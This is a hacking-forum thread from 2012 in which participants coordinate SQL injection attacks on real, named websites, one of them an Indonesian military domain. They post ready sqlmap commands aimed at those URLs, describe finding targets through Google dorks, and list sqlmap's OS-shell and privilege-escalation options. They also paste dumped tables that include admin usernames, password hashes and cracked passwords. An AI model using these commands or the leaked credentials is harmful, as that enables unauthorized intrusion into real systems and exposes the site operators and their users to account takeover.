SQLi Sqlmap.py
#61
ok bro :D
<< back|track'ers newbee

#62
(03-22-2012, 07:22 PM)fake666 Wrote: ok bro :D

OK, let's get started. What should we discuss first? :)
Well, I've got a vulnerable one here.

C:\sqlmap>sqlmap.py -u http://www.altechna.com:80/product_details.php?id=374 --random-agent --threads 5 -D altechna2 -T additional_user --columns

Want to try it?

My connection isn't really strong enough for injecting, lol

#63
(03-22-2012, 11:18 PM)junior.riau18 Wrote:
(03-22-2012, 07:22 PM)fake666 Wrote: ok bro :D

OK, let's get started. What should we discuss first? :)
Well, I've got a vulnerable one here.

C:\sqlmap>sqlmap.py -u http://www.altechna.com:80/product_details.php?id=374 --random-agent --threads 5 -D altechna2 -T additional_user --columns

Want to try it?

My connection isn't really strong enough for injecting, lol
Let's go, bro??
Want to try mine too??
python sqlmap.py -u "www.tni.mil.id/index2.php?page=datagallery.html&gctg_code=27" --random-agent --threads 10 --dbs


Oh yeah, I also want to ask.. what do you use to find the vulnerable sites?
<< back|track'ers newbee

#64
Bro, isn't there a scarier target than that -____-" the TNI, good grief, lol

I use Google, Google dorks. Usually you'd write it as inurl:product.php?id=, right?

Well, I don't use inurl, just product.php?id= directly. It's up to us really, it's just a matter of imagination :)
Once the injection is done, we'll try what you meant.
Here are the options:

Code:
--os-cmd=OSCMD      Execute an operating system command
--os-shell          Prompt for an interactive operating system shell
--os-pwn            Prompt for an out-of-band shell, meterpreter or VN
--os-smbrelay       One click prompt for an OOB shell, meterpreter or
--os-bof            Stored procedure buffer overflow exploitation
--priv-esc          Database process' user privilege escalation
--msf-path=MSFPATH  Local path where Metasploit Framework is installed
--tmp-path=TMPPATH  Remote absolute path of temporary files directory

#65
hahaha
Better than yesterday, that was the Polri, haha :)
But the admin there only disabled right-click and didn't patch the system, so I just tested it ==
I'll wait for you first, haha, and while you're at it, write up the tutorial :D
<< back|track'ers newbee

#66
You're scary :D I could get bombed, lol. How about we just use my target?? A foreign target is a bit safer :P

Go ahead and dump it first :D
For the table, just switch straight to the "users" table
drop the quotes, OK

#67
Haha, I'm already shaking here..

OK bro, I'm looking through the contents now
<< back|track'ers newbee

#68
That's why you shouldn't go for the weird ones, lol
When you're done dumping the users table, post it here or just PM me :P

#69
Database: altechna2
Table: adminlog
[6 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| action | varchar(255) |
| item_id | int(11) |
| item_name | varchar(50) |
| timestamp | int(11) |
| user_id | int(11) |
| username | varchar(25) |
+-----------+--------------+

Database: altechna2
Table: additional_users
[4 columns]
+---------------------+---------+
| Column | Type |
+---------------------+---------+
| additional_users_id | int(11) |
| content_id | int(11) |
| page_id | int(11) |
| user_id | int(11) |
+---------------------+---------+


Database: altechna2
Table: additional_users
[0 entries]
+---------------------+
| additional_users_id |
+---------------------+
+---------------------+


Found nothing ==
Anyone else want to try too?
Sorry, I was wrong earlier, there is something, junior.riau18
Here it is

Database: altechna2
Table: users
[3 entries]
+--------------------------------------------+------------+
| password | username |
+--------------------------------------------+------------+
| f49e49c743ab7195b10386bef8ac9943 | mediaforma |
| c9330587565205a5b8345f60c620ecc6 (editor1) | editor |
| 6acb0784b9dde050a12dc69edc69b45f (namas) | admin |
+--------------------------------------------+------------+

but I can't log in
arghh==
<< back|track'ers newbee

#70
Use the users table. There are 70 tables there, bro :P
If you don't believe me, just try running -D altechna2 --tables
then you'll see how many tables it returns, lol





